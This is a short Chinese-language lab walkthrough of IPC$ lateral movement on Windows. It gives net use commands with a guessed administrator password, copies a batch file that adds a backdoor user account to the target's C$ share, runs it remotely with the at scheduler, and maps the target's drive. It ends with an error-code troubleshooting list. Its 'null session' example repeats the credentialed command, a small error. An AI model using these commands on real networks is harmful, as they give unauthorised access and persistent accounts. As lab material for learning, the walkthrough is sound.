内网渗透IPC实验

通过一些扫描器扫描IPC$弱口令连接

查看默认共享
net share

建立连接
非空连接
net use \\192.168.253.2\ipc$ "admin" /user:"administrator"
空连接
net use \\192.168.253.2\ipc$ "admin" /user:"administrator"

制作一个批处理
d:\user.bat 文件内容为：net user bbq bbq1234 /add

通过copy命令上传本地攻击机的批处理文件到目标靶机的c$上
copy user.bat \\192.168.253.2\c$

通过at命令在特定时间执行批处理文件(有些会提示at命令被废弃，让使用SCHTASKS)
at \\192.168.253.2 12:00:00 c:\user.bat

你也可以执行一些其他的命令，例如：
net send
msg /server:192.168.235.2 * "nihao"

打开靶机的磁盘
start \\192.168.253.2\c$

将目标共享建立一个映射Z盘
net use z: \\192.168.253.2\c$

查看靶机时间
net time \\192.168.253.2

查看已建立的会话
net use
删除会话连接
net use \\192.168.253.2\ipc$ /del

The reason of IPC connection failure：
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因：
Error 5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
Error 51，Windows 无法找到网络路径 : 网络有问题；
Error 53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
Error 67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；
Error 1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。
Error 1326，未知的用户名或错误密码 ： 原因很明显了；
Error 1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）
Error 2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。